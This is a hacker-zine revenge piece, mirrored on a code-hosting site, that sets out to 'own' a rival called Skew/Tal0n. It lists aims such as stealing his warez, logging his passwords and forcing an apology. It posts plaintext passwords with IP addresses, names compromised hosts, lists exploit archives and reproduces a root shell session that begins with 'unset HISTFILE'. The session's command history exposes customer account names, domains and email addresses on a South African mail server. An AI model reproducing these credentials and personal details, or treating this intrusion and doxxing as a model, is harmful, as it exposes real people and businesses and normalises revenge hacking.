Mirrors/Zines
1
0
Fork 0
mirror of https://github.com/fdiskyou/Zines.git synced 2025-03-09 00:00:00 +01:00
Code Issues Releases Wiki Activity
Zines/dikline/skew.txt
fdiskyou 180dfff1cc bring back some more
2017-12-10 21:54:57 +00:00

4280 lines
138 KiB
Text
Raw Blame History

#!/usr/bin/skew_gets_owned
#dk/archives/submission
#by murz
Skew or as some know him as Tal0n has been pissing off the wrong people
he lies to his freinds, hacks from his freinds boxes, codes shitty code, talks
way to much shit about people he shouldnt.. is there anymore reason not to
own this kid. side not if you have a shell on one of his boxes rm youreself
skew has been trojaned more than my highschool prom date.
------------------------------------------------------------------------------------------------------
Checklist:
[1] Find Proof Skew == Tal0n
[2] Get into his bhugc/darkminds group and steal warez.
[3] log his passwds
[4] log his shells
[5] get his docs
[6] make him hand over all his code to me.
[7] make his state a public appology on his site, #darpa, #phrack, #darknet
------------------------------------------------------------------------------------------------------
so lets get this shit started.
[1] PR00F
(01:50:11) omgseckz : tell me the truth.. are you really tal0n ?
(01:50:32) Skew --> http://skew.blackhat.ru: yep.. but dont ever address me as my alter
ego again plz
[2] GET INTO BHUGC // DARKMINDS AND STEAL WAREZ.
May 31 18:10:32 <skew> <explaination>
May 31 18:10:36 <skew> BlackHat UnderGround Community is a community of codes in the
blackhat community that contribute code on a server that is shared with the other
blackhats who have access to it. The community stays updated and more alive when people
upload more and more private exploits, tools, shellcodes, and other non-public works of
the community member.
May 31 18:10:39 <skew> Currently, we are just starting up and may have a server in a week
or so. If you are interested in joining the community, the requirement is when the server
is up and we are organized to upload ONE exploit written by yourself and we encourage the
uploads to atleast once a month although not required.
May 31 18:10:43 <skew> </explaination>
May 31 18:11:56 <skew> akula talked to me about it today
May 31 18:12:05 <skew> i guess we better start on it
May 31 18:28:09 <skew> skew invite ppl you think would be interested in this in here
May 31 18:28:11 <skew> skew and paste them that if you like to give them a intro to BHUGC
May 31 18:28:15 <skew> skew and paste them that if you like to give them a intro to BHUGC
May 31 18:28:17 <skew> bb
Ok, looks like we're in he is their warez list:
====================================
14,888 priv8LEEEET.pl
25,354 openssl-too-open.tar.gz
5,969 m00-SPAm.zip
839,680 m00-deadbear3.tar.gz
12,300 557vnc.extra.c
37,787 dfnctsc-kaiten.c
7,868 imap4life.pl <-- only thing here coded by skew.. and he had alot of help with
that even.
54,092 m00-apache-priv8.tar.gz
8,516 priv8sambar.pl
806,450 m00-deadbear2.tar.gz
805,930 m00-deadbear.tar.gz
===================================
[3] LOG HIS PASSWORDS.
2to: 24.177.23.252 user: skew pass: 5ubiZ3r0 #skew
skewtty.dyndns.org
pass_from: 212.202.49.153 user: skew pass: *jd4^52h*d2= #skew localhost
### skew rooted boxes ###
plet.compumail.co.za
knysna.compumail.co.za
umhlanga.compumail.co.za
lin02.compumail.co.za
histologic.no-ip.info
irenefw.irenecountrylodge.co.za 196.25.22.178
[4] LOG HIS SHELLS:
------------------------------------
skew @ plet: Here we learn Skew has mad eleet codes and can sshbrute like a bitch.
------------------------------------
login as: root
root@196.15.249.204's password:
[root@plet root]# unset HISTFILE
[root@plet root]# history
1 dig mail.nfmc.org
2 mailconf
3 dig mail.nfmc.org.za
4 dig nfmc.org.za
5 dig nfmc.org.za mx
6 mailconf
7 exit
8 cd /home/
9 adduser aawind_heather
10 passwd aawind_heather
11 mailconf
12 exit
13 passwd vepac_patcarson
14 exit
15 netconf
16 drakconnect
17 exit
18 cd /home/
19 passwd aawind_heather
20 exit
21 cd /home/
22 exit
23 ssh lin02.compumail.co.za
24 exit
25 cd /home/
26 exit
27 mailconf
28 exit
29 mailconf
30 cd /home/
31 cd motocomp
32 ll
33 userconf
34 ll
35 mailconf
36 ll /var/spool/mail/mclauren
37 passwd mclauren/
38 passwd mclauren
39 ll /var/spool/mail/mclauren
40 exit
41 ll /var/spool/mail/mclauren
42 exit
43 ll /var/spool/mail/mclauren
44 exit
45 cd /var/spool/mail/
46 exit
47 mailconf
48 exit
49 dig merchantsponsors.co.za
50 dig merchantsponsors.co.za mx
51 dig www.merchantsponsors.co.za
52 /etc/init.d/named restart
53 dig www.merchantsponsors.co.za
54 /etc/init.d/named restart
55 dig www.merchantsponsors.co.za
56 mailconf
57 ssh lin02
58 mailconf
59 exit
60 mailconf
61 cd /home/
62 adduser lw_danielle
63 mailconf
64 passwd lw_danielle
65 exit
66 vi /etc/ntp/step-tickers
67 vi /etc/ntp.conf
68 /etc/init.d/ntpd restart
69 grep ntpd /var/log/messages
70 exit
71 dig webmail.alberton.gp.school.za
72 ping induna.saix.net
73 ssh 196.15.249.203
74 mailconf
75 ping exchange.alberton.gp.scholl.za
76 ping exchange.alberton.gp.school.za
77 exit
78 mailconf
79 ifconfig
80 exit
81 mailq
82 exit
83 mailconf
84 mailq
85 mailconf
86 exit
87 cd /etc/vmail/
88 ll
89 exit
90 cd home
91 cd /home
92 ls
93 passwd
94 passwd lw_danielle
95 passwd lw_danielle\
96 passwd lw_danielle
97 mailconf
98 ls
99 passwd lw_danielle
100 exit
101 mailconf
102 ssh lin02
103 exit
104 mailconf
105 ssh lin2
106 ssh lin02
107 mailconf
108 clear
109 cd /home/
110 ls
111 cd frog
112 ll
113 cd ..
114 mailconf
115 exit
116 dig neslife.co.za mx
117 dig neslife.co.za mx @196.15.249.201
118 dig neslife.co.za mx @196.15.249.203
119 dig nestlife.co.za mx @196.15.249.203
120 mailconf
121 cd /h0ome
122 cd /home
123 ls
124 ping www.google.com
125 exit
126 mailconf
127 passwd atn_natasha
128 passwd atn_marianne
129 exit
130 mailconf
131 adduser subaru_maria
132 passwd subaru_maria
133 exit
134 cd /var/log/mail
135 vi info
136 exit
137 passwd subaru_maria
138 mailconf
139 exit
140 mailconf
141 cd /var/spool/mail
142 ll aawind_zack
143 exit
144 ssh 196.15.249.201
145 exit
146 cd\
147 cd /
148 cls
149 clear
150 mqueue
151 mailq
152 cat /var/log/mail/info | grep bsn-i.com
153 mailconf
154 ssh lin02
155 exit
156 cat /var/log/mail/info | grep vusi.sithole@nestlife.co.za
157 cat /var/log/mail/info | grep fallback.nestlife@compumail.co.za
158 clar
159 clear
160 cat /var/log/mail/info | grep fallback.nestlife@compumail.co.za
161 ssh lin02
162 exit
163 mailconf
164 exit
165 ssh lin02.lanlink.co.za
166 exit
167 mailconf
168 cd /home/
169 ls
170 adduser cm_info
171 passwd cm_info
172 userdel cm_info
173 mail
174 ll
175 adduser catchcadmapping
176 passwd catchcadmapping
177 mailconf
178 exit
179 cd /var/named/
180 ll
181 cd /etc/
182 vi named.conf
183 exit
184 mailconf
185 exit
186 rndc reload
187 rndc reload cadmapping.co.za
188 vi /var/named/sec/cadmapping.co.za
189 exit
190 vi /etc/named.conf
191 rndc reload
192 vi /etc/named.conf
193 rndc reload
194 vi /etc/named.conf
195 rm /var/named/sec/mabula.co.za
196 rm /var/named/sec/lodge.mabula.co.za
197 rm /var/named/sec/holton.co.za
198 rm /var/named/sec/ehd.co.za
199 rndc reload
200 vi /etc/named.conf
201 rndc reloa
202 rndc reload
203 rndc reload taalgenoot.co.za
204 rndc taalgenoot.co.za reloa
205 rndc reload
206 rndc reload taalgenoot.co.za
207 vi /etc/named.conf
208 rndc reload taalgenoot.co.za
209 rndc reload
210 rndc reload taalgenoot.co.za
211 tail /var/log/messages
212 vi /etc/named.conf
213 rndc reload taalgenoot.co.za
214 rndc reload
215 rndc reload taalgenoot.co.za
216 exit
217 wshaper status
218 whereis wshaper
219 vi /usr/sbin/wshaper
220 wshaper
221 whereis wshaper
222 wshaper status
223 vi /usr/sbin/wshaper
224 wshaper stop
225 wshaper
226 wshaper status
227 cd /etc/init.d/
228 ll
229 cp named wshaper
230 vi wshaper
231 rm wshaper
232 bwm
233 wshaper status
234 exit
235 mailconf
236 reboot
237 exit
238 cd /var/spool/mail/
239 mailconf
240 exit
241 passwd msp_info
242 exit
243 ssh lin02.lanlink.co.za
244 exit
245 ssh lin02.lanlink.co.za
246 exit
247 vi /etc/vmail/aliases.frogav.co.za
248 exit
249 cat /var/log/mail/info | grep arcadia.no-ip.info
250 locate fetchmail
251 exit
252 vi /etc/named.conf
253 exit
254 ssh lin02.lanlink.co.za
255 exit
256 wshaper status
257 wshaper
258 netstat -an | grep :25
259 df -h
260 exit
261 /etc/init.d/sendmail restart
262 /etc/init.d/sendmail stop
263 /etc/init.d/sendmail start
264 ssh uvongo
265 exit
266 mailconf
267 dig www.khuphukani.co.za
268 dig www.khuphukani.co.za @196.15.249.203
269 userconf
270 mailconf
271 cd /home
272 ls
273 mailconf
274 adduser kh_info
275 adduser kh_sales
276 adduser kh_susanb
277 adduser kh_alessia
278 adduser kh_technical
279 passwd kh_info
280 passwd kh_sales
281 passwd kh_susanb
282 passwd kh_alessia
283 passwd kh_technical
284 mailconf
285 cd /var/spool/mail/
286 ls
287 ls kh_ -s
288 ls -s
289 exit
290 df -h
291 /etc/init.d/sendmail stop
292 pf -ef | grep sendmail
293 ps
294 psps -ef | grep sendmail
295 ps -ef | grep sendmail
296 /etc/init.d/sendmail start
297 tail -f /var/log/mail/info
298 mailconf
299 vi /var/lib/mailertable
300 cd /etc/vmail/
301 ll aliases.alltransportneeds.co.za
302 vi /var/lib/mailertable
303 vi aliases.alltransportneeds.co.za
304 mailconf
305 ll *atn*
306 ll
307 mailconf
308 cd /var/named/sec/
309 ll
310 mailconf
311 dig atn.co.za mx
312 dig atn.co.za ns
313 dig alltransportneeds.co.za ns
314 wshaper status
315 exit
316 ifconfig
317 exit
318 telnet 127.0.0.1 110
319 telnet 127.0.0.1 25
320 exit
321 dig pop.khupukano.co.za
322 mailconf
323 passwd hk_info
324 passwd kh_info
325 passwd kh_technical
326 passwd kh_alissia
327 cd /home
328 passwd kh_alessia
329 passwd kh_sales
330 passwd kh_susanb
331 passwd kh_technical
332 dig pop.khuphukani.co.za
333 /etc/init.d/named resatrt
334 /etc/init.d/named restart
335 dig pop.khuphukani.co.za
336 exit
337 cd /home
338 ls
339 passwd kh_technical
340 exit
341 clear
342 mailconf
343 adduser patm_kzn
344 passwd patm_kzn
345 adduser patm_wc
346 passwd patm_wc
347 adduser patm_er
348 passwd patm_er
349 passwd patm_nr
350 adduser patm_nr
351 passwd patm_nr
352 mailconf
353 exit
354 dig ub.co.zamx
355 dig ub.co.za mx
356 mailconf
357 exit
358 cd /
359 cd /etc/vmail/
360 cat aliases.delvenco.co.za
361 mailconf
362 cd /var/spool/mail/
363 ll catchdelvenco
364 ll -h catchdelvenco
365 ll -m catchdelvenco
366 ll catchdelvenco
367 exit
368 mailconf
369 exit
370 adduser catchibe
371 mailconf
372 adduser ibe_sandyb
373 adduser ibe_roadmech
374 adduser ibe_ibe
375 adduser ibe_tarbaby
376 passwd ibe_sandyb
377 passwd ibe_roadmech
378 passwd ibe_tarbaby
379 passwd ibe_ibe
380 ssh knysna.compumail.co.za
381 exit
382 mailq
383 exit
384 tail -f /var/log/mail/info | grep hotmail.com
385 exity
386 exit
387 tail -f /var/log/mail/info | grep italpizza.co.za
388 passwd emp-judy
389 tail -f /var/log/mail/info | grep italpizza.co.za
390 ssh lin02
391 mailconf
392 exit
393 mailconf
394 l /var/spool/mail/ibe_ibe
395 ll /var/spool/mail/ibe_ibe
396 tail -f /var/log/mail/info | grep ibe.co.za
397 ll /var/spool/mail/ibe_ibe
398 tail -f /var/log/mail/info | grep ibe.co.za
399 exit
400 clear
401 mailconf
402 /etc/init.d/sendmail restart
403 exit
404 vi /etc/vmail/aliases.falstaff.co.za
405 mailconf
406 cd /etc/
407 vi named.conf
408 dig mx delvenco.co.za
409 exit
410 cd /var/spool/mail/
411 grep no-ip.info *
412 ll ber*
413 cd /etc/vmail/
414 cat aliases.delvenco.co.za
415 cat aliases.alltransportneeds.co.za
416 mailconf
417 cat aliases.onestar.co.za
418 mailconf
419 cd /
420 exit
421 mailconf
422 cd /etc/vmail/
423 mailconf
424 /etc/init.d/sendmail stop
425 /etc/init.d/sendmail start
426 vi /root/.fetchmailrc
427 passwd catchonestar
428 cd /var/lib/
429 ll
430 vi mailertable
431 passwd catchdelvenco
432 ll /var/spool/mail/catchliber*
433 cd /var/spool/mail/
434 ll *liber*
435 exit
436 cd /home/
437 mailconf
438 clear
439 sendmail restart
440 /etc/init.d/sendmail restart
441 exit
442 mailconf
443 ssh lin02
444 exit
445 ssh 196.25.45.234
446 exit
447 autopasswd
448 autopasswd --help
449 autopasswd -S joe
450 whereis autopassword
451 whereis autopasswrd
452 whereis autopasswd
453 file /usr/bin/autopasswd
454 vi /usr/bin/autopasswd
455 cd /home/joe/
456 ll
457 genpassHex -?
458 genpassHex password
459 man genpassHex
460 whereis genpassHex
461 more /usr/bin/genpassHex
462 exit
463 vi /etc/named.conf
464 33
465 ll
466 cd /var/named/sec/
467 rll
468 ll
469 ll pak*
470 exit
471 ssh parktonian.n0-ip.info
472 ssh parktonian.no-ip.info
473 ssh parktonian.n0-ip.infoparktonian.n0-ip.info
474 ssh 165.165.80.124
475 ssh 165.165.80.1
476 ssh 165.165.85.80
477 ssh parktonian.no-ip.info
478 ping parktonian.no-ip.info
479 ssh parktonian.no-ip.info
480 ssh 165.165.85.80
481 ssh parktonian.no-ip.info
482 exity
483 exit
484 mailconf
485 adduser tisc_derek.house
486 passwd tisc_derek.house
487 userdel tisc_tisc_derek.house -r
488 userdel tisc_tisc.derek.house -r
489 userdel tisc_derek.house -r
490 useradd tisc_d.house -r
491 useradd tisc_d.house
492 mailconf
493 cd /home
494 ls
495 userdel tisc_d.house
496 useradd tisc_d.house
497 passwd tisc_d.house
498 cd /var/named/
499 ls
500 malconf
501 mailconf
502 dig mail.tiscpty.com
503 ifconfig
504 passwd tisc_d.house
505 dig webmail.tiscpty.com
506 dig webmail.tiscpty.com mx
507 cd home
508 cd /home
509 ls
510 passwd tisc_d.house
511 /etc/init.d/sendmail restart
512 [root@plet home]# ls tisc
513 userdel tisc_d.house
514 useradd d.house
515 passwd house
516 passwd d.house
517 mailconf
518 dig mail.tiscpty.com
519 dig tiscpty.com mx
520 dig tiscpty.com mx @192.168.20.2
521 mailconf
522 dig tiscpty.com x
523 dig tiscpty.com mx
524 dig tiscpty.com mx @196.25.1.1
525 dig tiscpty.com mx @induna.saix.net
526 userdel d.house -r
527 ls
528 exit
529 mailconf
530 passwd emp-judy
531 exit
532 mailconf
533 exit
534 cd home
535 cd /
536 ls
537 cd home
538 ls
539 exit
540 mailconf
541 ifconfig
542 mailconf
543 /etc/sen
544 cd /etc/init.d/sendmail status
545 cd /etc/init.d/sendmail stop
546 /etc/init.d/sendmail status
547 /etc/init.d/sendmail status stop
548 /etc/init.d/sendmail stop
549 /etc/init.d/sendmail start
550 /etc/init.d/sendmail restart
551 cd /var/spool/mail/
552 ls tisc_d.house
553 rm tisc_d.house
554 ls tisc_d.house
555 ls mailconf
556 mailconf
557 ls tisc_d.house
558 exit
559 mailconf
560 mailconf\
561 mailconf
562 ifconfig
563 exit
564 tail -f errors | grep tiscpty.comtail -f errors | grep tiscpty.com
565 cd /var/log
566 cd mail
567 ls
568 tail -f info | grep tiscpty
569
570 tail -f info | grep tiscpty
571 exit
572 mailconf
573 /etc/init.d/sendmail restart
574 cd /var/log
575 ls
576 vi mail
577 cd mail
578 ls
579 vi errors
580 ls
581 vi info
582 ls
583 tail -f errors | grep tiscpty.com
584 mailconf
585 exit
586 cd /home/
587 mailconf
588 adduser subaru_parts
589 passwd subaru_parts
590 exit
591 wshaper start
592 mailq
593 mailstat
594 deldefermail
595 mailq
596 whereis deldefermail
597 vi /usr/sbin/de;def
598 vi /usr/sbin/deldefermail
599 delqueue
600 mailq
601 whereis delqeue
602 whereis delqueue
603 vi /usr/sbin/delqueue
604 mailq
605 vi /usr/sbin/delqueue
606 sendmail -?
607 man sendmail
608 whereis sendmailspool
609 vi /usr/sbin/sendmailspool
610 exit
611 fsav -v
612 fsav --version
613 df -h
614 exit
615 dig kirk.co.za mx
616 mailconf
617 /etc/init.d/postfix restart
618 /etc/init.d/sendmail restart
619 exit
620 cd /etc/ma
621 cd /etc/mail
622 ll
623 vi relay_allow
624 vi virtusertable
625 vi name_allow
626 ll
627 cat access
628 /etc/init.d/xinetd restart
629 /etc/init.d/network restart
630 /etc/init.d/sendmail stop
631 /etc/init.d/sendmail start
632 wshaper status
633 tail -f /var/log/mail/info
634 chkconfig --list
635 cd /var/spool/
636 cd mail/
637 ll kirk_*
638 ll -h kirk_*
639 ll -m kirk_*
640 rm -rf kirk_fallback
641 mailconf
642 /etc/init.d/sendmail stop
643 /etc/init.d/sendmail start
644 pwd
645 ll -h
646 ll -?
647 ll
648 ll -H
649 ls -h
650 ls -H
651 ls -lah
652 man ll
653 ll kirk_*
654 df -h
655 ll
656 ll | more
657 rm ll_joe
658 ll | more
659 mailconf
660 /etc/init.d/sendmail stop
661 /etc/init.d/sendmail start
662 grep zacron passwd
663 grep zacron /etc/passwd
664 userdel -r catchzacron
665 userdel -r zacron_events
666 userdel -r zacron_zach
667 userdel -r zacron_zie
668 mail
669 df -h
670 ll
671 ll | more
672 rm -f BOGUS.alanna.*
673 ll | more
674 rm -f ssmark
675 exit
676 tcpdump -ni eth0 src 165.146.147.111
677 ping 165.146.147.111
678 tcpdump -ni eth0 src 165.146.147.111
679 tcpdump -ni eth0 src 165.146.100.119
680 netstat -an | grep 165.146.100.119
681 netstat -an | more
682 netstat -an
683 df -h
684 /etc/init.d/network restart
685 /etc/init.d/xinetd restart
686 locate netstat
687 tail -f /var/log/mail/info
688 tail -f /var/log/mail/info | grep 165.146.100.119
689 grep 165.146.100.119 /var/log/mail/info
690 tail -f /var/log/mail/info | grep 165.146.100.119
691 wshaper status
692 wshaper stop
693 tail -f /var/log/mail/info | grep 165.146.100.119
694 tail -f /var/log/mail/info
695 tail -f /var/log/mail/info | grep ipop3d
696 top
697 tail -f warnings | grep kirk
698 cd /var/log
699 tail -f warnings | grep kirk
700 cd /mail
701 cd mail
702 tail -f warnings | grep kirk
703 exit
704 cd /var/log
705 ls
706 tail -f messages | grep kirk
707 ifconfig
708 tail -f messages | grep kirk
709 mailconf
710 exit
711 cd /var/log
712 ls
713 cd mail
714 ls
715 tail -f errors | grep kirk
716 mailconf
717 exit
718 cd /var/log
719 ls
720 cd mail
721 ls
722 vi errors
723 vi info
724 mailconf
725 tail -f info | grep kirk
726 exit
727 ssh 196.15.249.201
728 exit
729 cd /var/named/
730 ls
731 cd sec/
732 ll
733 cp r-r-m.co.za ratana.co.za
734 vi r-r-m.co.za
735 vi ratana.co.za
736 exit
737 date
738 ssh 196.15.249.203
739 exit
740 ssh 196.15.249.203
741 date
742 exit
743 tail -f /var/log/mail/info | grep ub_saul@compumail.co.za
744 exit
745 cd /home
746 ls
747 mailconf
748 exit
749 cd /var/named/
750 ls
751 cd sec/
752 ls
753 cp ratana.co.za iphiko.co.za
754 vi iphiko.co.za
755 exit
756 /etc/init.d/named restart
757 vi /var/log/messages
758 clear
759 tail -f /var/log/messages
760 exit
761 cd /var/log/mail/
762 grep deebar.co.za info
763 exit
764 wshaper statuis
765 wshaper status
766 wshaper stop
767 wshaper
768 wshaper status
769 exit
770 top
771 cd /proc/
772 ll
773 ll filesystems
774 cat filesystems
775 ll fs
776 ll ide/
777 ll
778 cat sys/fs/file-max
779 cat sys/fs/inode-
780 cat sys/fs/inode-nr
781 cat sys/fs/inode-state
782 cat sys/kernel/sysrq
783 cat sys/vm/bdflush
784 echo 100 5000 640 2560 150 30000 5000 1884 2 > /proc/sys/vm/bdflush
785 ulimit
786 ulimit -?
787 ulimit -u 2048
788 mem
789 free
790 free -?
791 top
792 ps -ef
793 cd /etc/rc.d/
794 vi rc.local
795 echo 8192 > /proc/sys/fs/file-max
796 echo 8192 > /proc/sys/fs/inode-max
797 echo 1 > /proc/sys/kernel/sysrq
798 echo 6 > /proc/sys/net/ipv4/tcp_syn_retries
799 echo 90 > /proc/sys/net/ipv4/tcp_fin_timeout
800 echo 0 > /proc/sys/net/ipv4/tcp_timestamps
801 ulimit -u 2048
802 echo 100 5000 640 2560 150 30000 5000 1884 2 > /proc/sys/vm/bdflush
803 /usr/local/sbin/mii-diag -A 100baseTx-FD eth1
804 /usr/local/sbin/mii-diag -A 100baseTx-FD eth0
805 /usr/local/sbin/mii-diag -F 100baseTx-FD eth1
806 vi rc.local
807 exit
808 mailconf
809 ll /var/spool/mail/atn_mark
810 ll /var/spool/mail/atn_barney
811 tail -f /var/log/mail/info | grep @alltransportneeds.co.za
812 ll /var/spool/mail/atn_barney
813 ll /var/spool/mail/atn_mark
814 tail -f /var/log/mail/info | grep @alltransportneeds.co.za
815 cat /var/log/mail/info | grep @alltransportneeds.co.za
816 vi mailconf
817 mailconf
818 tail -f /var/log/mail/info | grep @atn.co.za
819 cat /var/log/mail/info | grep @alltransportneeds.co.za
820 exit
821 ifconfig
822 mailconf
823 adduser ratan_gavin
824 userdel ratan_gavin /r
825 userdel ratan_gavin -rt
826 userdel ratan_gavin -r
827 adduser ratana_gavin
828 passwd ratana_gavin
829 exit
830 mailconf
831 adduser ratana_bianca
832 adduser ratana_brian
833 adduser ratana_aub
834 adduser ratana_ntabiseng
835 passwd ratana_bianca
836 passwd ratana_brian
837 passwd ratana_aubrey
838 passwd ratana_ntabiseng
839 cat /var/log/messages
840 ssh knysna.compumail.co.za
841 exit
842 mailq
843 /etc/init.d/sendmail stop
844 man sendmail
845 cd /var/spool/mqueue/
846 ll
847 rm -f *
848 /etc/init.d/sendmail start
849 ll
850 mailq
851 exit
852 ssh 196.34.39.26
853 mailq
854 exit
855 reboot
856 exit
857 ping sodwana
858 exit
859 cd /etc/vmail/
860 ll aliases.alltransportneeds.co.za
861 exit
862 ssh hitek.no-ip.info
863 mail
864 ping hitek.no-ip.info
865 drakconf
866 cat /var/lib/mailertable
867 cat /var/lib/mailertable | grep logisticor
868 exit
869 locate wshap
870 vi /usr/sbin/wshaper
871 exit
872 mailconf
873 ssh 196.15.249.201
874 ssh 196.25.45.246
875 ssh andre@196.25.45.246
876 exit
877 ssh umglanga.compumail.co.za
878 exit
879 ssh lin02
880 ssh 196.25.45.254
881 exit
882 dig mail.tiscali.co.za
883 exit
884 df -h
885 ll
886 cd /
887 locate iso
888 locate iso | more
889
890 ssh 196.15.249.207
891 exit
892 mailconf
893 exit
894 ssh lin02.lanlink.co.za
895 exit
896 mail mark@mentorfreight.co.za
897 exit
898 mailconf
899 cd /var/spool/mail/
900 ll mentor
901 cat mentor
902 mailconf
903 cat catchmf
904 ll catchmft
905 ll catchmtf
906 passwd catchmtf
907 exit
908 tail -f /var/log/mail/info | grep hi-tek.co.za
909 exit
910 mailconf
911 tail -f /var/log/mail/info | grep catchhitek
912 exit
913 vi /var/lib/mailertable
914 exit
915 mailconf
916 cd /home/
917 adduser catchhitek
918 passwd catchhitek
919 mailconf
920 ll /var/spool/mail/catchhitek
921 mailconf
922 ll /var/spool/mail/catchhitek
923 tail -f /var/log/mail/info | grep logisticor.com
924 ssh mail.logisticor.com
925 telnet mail.logisticor.com 25
926 ssh mail.logisticor.com
927 ssh joe@mail.logisticor.com
928 telnet mail.logisticor.com 25
929 exit
930 clear
931 tail -f /var/log/mail/info | grep hi-tek.co.za
932 tail -f /var/log/mail/info | grep wynand
933 ssh lin02.compumail.co.za
934 ping lin02.compumail.co.za
935 ssh lin02.compumail.co.za
936 ping lin02.compumail.co.za
937 ssh lin02.compumail.co.za
938 mailconf
939 ssh lin02.compumail.co.za
940 telnet mail.logisticor.com 25
941 ssh lin02.compumail.co.za
942 exit
943 cat /var/log/mail/info | grep histologic.co.za
944 mailconf
945 cat /var/log/mail/info | grep catchhisto
946 tail -f /var/log/mail/info | grep catchhisto
947 tail -f /var/log/messages
948 tail -f /var/log/mail/info | grep catchhisto
949 exit
950 tail -f /var/log/mail/info | grep histologic.co.za
951 ll /var/spool/mail/catchhisto
952 exit
953 ll /var/spool/mail/catchhisto
954 exit
955 mailconf
956 ssh lin02.lanlink.co.za
957 exit
958 mailconf
959 tail -f /var/log/mail/info | grep histologic.co.za
960 ll /var/spool/mail/catchhisto
961 tail -f /var/log/mail/info
962 tail -f /var/log/mail/info | grep catchhisto
963 exit
964 ssh histologic.no-ip.info
965 exit
966 cat /etc/vmail/aliases.subaru-pretoria.co.za
967 adduser subaru_marelie
968 vi /etc/shadow
969 vi /etc/vmail/aliases.subaru-pretoria.co.za
970 vi /etc/shadow
971 exit
972 ssh knysna.compumail.co.za
973 tail -f /var/log/mail/info | grep 165.146.101.31
974 mailconf
975 dig frogav.co.za mx
976 dig frogav.co.za mx @196.43.1.14
977 mailconf
978 exit
979 mailconf
980 ssh lin02.compumail.co.za
981 adduser htgina
982 passwd htgina
983 mailconf
984 exit
985 w
986 login root
987 logout
988 exit
989 w
990 logout
991 unset HISTFILE
992 history
[root@plet root]# ls -la
total 297498
drwx------ 34 root root 3688 Jun 9 11:45 ./
drwxr-xr-x 21 root adm 880 May 30 08:20 ../
lrwxrwxrwx 1 root root 41 Feb 27 2003
.DCOPserver_plet.compumail.co.za_:0 -> /root/.DCOPserver_plet.compumail.co.za__0
-rw-r--r-- 1 root root 67 Mar 13 2003 .DCOPserver_plet.compumail.co.za__0
-rw------- 1 root root 434 Jun 12 2004 .ICEauthority
-rw------- 1 root root 312 May 8 16:06 .Xauthority
-rw-r--r-- 1 root root 1479 Feb 16 2002 .Xdefaults
-rw------- 1 root root 15889 Jun 14 01:21 .bash_history
-rw-r--r-- 1 root root 24 Feb 16 2002 .bash_logout
-rw-r--r-- 1 root root 106 Feb 16 2002 .bash_profile
-rw-r--r-- 1 root root 226 Feb 16 2002 .bashrc
drwx------ 2 root root 72 Oct 20 2003 .cedit/
drwxr-xr-x 3 root root 96 Sep 3 2003 .cpan/
-rw-r--r-- 1 root root 233 Feb 16 2002 .cshrc
-rw-r--r-- 1 root root 14 Feb 9 2003 .desktop
-rw------- 1 root root 222 Feb 9 2003 .draksync
-rwx--x--- 1 root root 538 Mar 30 2004 .fetchmailrc*
drwx------ 4 root root 128 Mar 13 2003 .gconf/
drwx------ 2 root root 80 Mar 13 2003 .gconfd/
drwxr-xr-x 2 root root 72 Feb 9 2003 .gnome/
drwx------ 3 root root 96 Mar 13 2003 .gnome2/
drwx------ 2 root root 48 Mar 13 2003 .gnome2_private/
drw------- 2 root root 200 Nov 2 2003 .gnupg/
-rw-r--r-- 1 root root 149 Feb 9 2003 .gtkrc
-rw-r--r-- 1 root root 124 Feb 9 2003 .gtkrc-2.0
-rw-r--r-- 1 root root 1111 Feb 9 2003 .gtkrc-kde
drwxr-xr-x 2 root root 112 Feb 9 2003 .icewm/
-rw-r--r-- 1 root root 160 Feb 9 2003 .info_perso
drwx------ 2 root root 48 Jun 11 2004 .inspect_tmp_dir/
drwxr-xr-x 4 root root 192 Feb 8 2003 .kde/
drwxr-xr-x 3 root root 144 Jun 15 2004 .mc/
drwxr-xr-x 2 root root 80 Feb 8 2003 .mcop/
-rw------- 1 root root 31 Feb 9 2003 .mcoprc
drwxr-xr-x 5 root root 144 Mar 13 2003 .mozilla/
drwxr-xr-x 2 root root 176 Feb 8 2003 .qt/
-rw-r--r-- 1 root root 135 Aug 31 2004 .rpmdrake
drwx------ 2 root root 80 Sep 15 2003 .spamassassin/
drwx------ 2 root root 136 Nov 14 2004 .ssh/
-rw-r--r-- 1 root root 189 Feb 16 2002 .tcshrc
-rw------- 1 root root 6112 Jun 9 11:45 .viminfo
-rw------- 1 root root 0 Mar 24 2004 .viminfo.tmp
-rw------- 1 root root 4096 Nov 26 2004 .viminfy.tmp
-rw------- 1 root root 0 Mar 24 2004 .viminfz.tmp
-rw-r--r-- 1 root root 3750 Feb 16 2002 .vimrc
-rw-r--r-- 1 root root 6 Feb 9 2003 .wmrc
-rw-r--r-- 1 root root 13396 Feb 8 2003 .xftcache
-rw------- 1 root root 9860 Aug 20 2003 .xsession-errors
-rwxr-xr-x 1 root root 3741018 Jun 14 2004
BitDefender-sendmail-1.5.5-2.linux-gcc3x.i586.tar.run*
-rw-r--r-- 1 root root 2394 Sep 3 2004 Creport
drwx------ 3 root root 152 Feb 9 2003 Desktop/
drwxr-xr-x 2 root root 48 Feb 9 2003 Documents/
drwx------ 7 root root 520 Jun 12 2004 Mail/
-rw-r--r-- 1 root root 2184 Sep 3 2004 Sreport
-rw-r--r-- 1 root root 628757 Mar 12 2004
XAM-BE-33-29672-LINUX-glibc23-sm11.tar.gz
-rw-r--r-- 1 root root 1082040 Jun 15 2004
XAM-BE-33-31609-LINUX-glibc23-sm11.tar.gz
-rw-r--r-- 1 root root 848085 Jun 18 2004
XAM-BE-33-31642-LINUX-glibc22-sm11.tar.gz
-rw-r--r-- 1 root root 1088878 Sep 3 2004
XAM-LEVEL3-33-33946-LINUX-glibc23-sm11.tar.gz
-rw-r--r-- 1 root root 1090708 Sep 10 2004
XAM-LEVEL3-33-34116-LINUX-glibc23-sm11.tar.gz
-rwxr-x--x 1 root root 513 Jan 4 16:14 aliases.frogav.co.za*
drwxr-xr-x 2 root root 1080 Nov 24 2004 altermime-0.3.6/
-rw-r--r-- 1 root root 69604 Nov 24 2004 altermime-0.3.6.tar.gz
drwxr-xr-x 8 joe joe 1096 Aug 31 2004 apg-2.2.3/
-rw-r--r-- 1 root root 49779 Aug 31 2004 apg-2.2.3-1mdk.i586.rpm
-rw-r--r-- 1 root root 108186 Aug 31 2004 apg-2.2.3.tar.gz
-rwxr-xr-x 1 root root 170 May 29 2003 cleanxmime*
-rw------- 1 root root 61440 May 9 12:47 core.13099
-rw------- 1 root root 61440 May 9 12:47 core.13184
-rw------- 1 root root 61440 May 9 12:47 core.13191
-rw------- 1 root root 61440 Apr 8 08:16 core.18972
